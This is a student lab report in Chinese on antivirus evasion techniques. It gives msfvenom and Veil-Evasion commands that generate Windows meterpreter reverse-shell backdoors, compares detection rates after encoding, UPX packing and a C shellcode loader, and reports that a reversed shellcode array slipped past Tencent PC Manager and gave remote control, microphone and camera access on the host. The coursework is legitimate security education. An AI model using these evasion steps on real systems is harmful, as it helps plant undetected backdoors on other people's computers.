20155305《網絡對抗》免殺原理與實踐

#20155305《網絡對抗》免殺原理與實踐 ##實驗主要過程 ###一、免殺效果參考基準

• Kali使用上次實驗msfvenom產生後門的可執行文件，剛剛傳送到Win主機就被電腦管家查殺了恢復後此次放入老師提供的網址http://www.virscan.org/進行掃描，有48%的殺軟報告病毒。

###二、使用msf編碼器

• 編碼一次 Kali輸入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5305端口號 -f exe >本身起後門名字.exe

理論上會下降被查出率，但由於老師說因爲使用的這個編碼平臺太著名了，很容易被殺軟盯上，因此實際上並無什麼變化。網站監測結果是51%的殺軟報告病毒，還不如不編碼呢（高了兩個百分點）。

回連成功

• 屢次編碼 Kali輸入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5305端口號 -f exe > 本身起後門名字.exe

屢次編碼依舊沒有任何做用，被電腦管家查殺，恢復後放入網站檢查

嘗試回連，錄音功能成功

###三、使用Veil-Evasion從新編寫源代碼

• 在Kali中安裝veil，sudo apt-get install veil，這其中有paython的安裝可能有些電腦沒有wine32，因此須要安裝apt-get install wine32

• 在Kali的終端中啓動Veil-Evasion 命令行中輸入veil，後在veil中輸入命令use evasion 依次輸入以下命令生成你的可執行文件：

use python/meterpreter/rev_tcp.py（設置payload）

set LHOST Kali的IP（設置反彈鏈接IP）

set LPORT 端口號（設置反彈端口）

generate 可執行文件名

選擇使用語言來編寫

根據生成路徑找到生成的可執行文件，放到網上進行檢測，有20%的殺軟報告病毒，這個異常難安裝的veil加python終於下降了被查殺率，仍是有些效果的。 嘗試回連，拍照功能成功

###四、UPX加殼嘗試

命令upx 5305.exe -o 5305-2.exe

upx加殼後的5305-2.exe看着很牛皮，可是被電腦管家妥妥查殺了。。。

再在網站掃描一下，百分之48的驚人數聽說明upx加殼沒什麼用啊

###五、C語言調用Shellcode

• 首先，在Kali上使用命令生成一個c語言格式的Shellcode數組。

• VS編譯運行產生exe文件（exe文件名不能存在20155305這樣的學號由於網站檢測時會說有明顯廣告語。。）

• 只有百分之十二的殺軟報告發現病毒，免殺效果很是可觀，重點是個人騰訊管家沒有彈出警告，有點遺憾，但有以爲免殺學會了以後確實有點厲害哦

• 優化

上面的結果已經不錯了，可是還能夠更好，好比逆序修改Shellcode數組，而後再用它替換上面的c文件裏本來的Shellcode數組。編譯運行後結果有了很大提高，電腦管家沒有查殺出來，優化先後都可實現殺軟共生

###六、實測優化版本、回連成功

按照上次實驗用過的msf監聽方法在Kali上打開監聽，在Win主機開啓殺軟（Win安裝騰訊電腦管家 ）的狀況下，運行最後生成的優化版exe文件，Kali成功獲取了Win主機的權限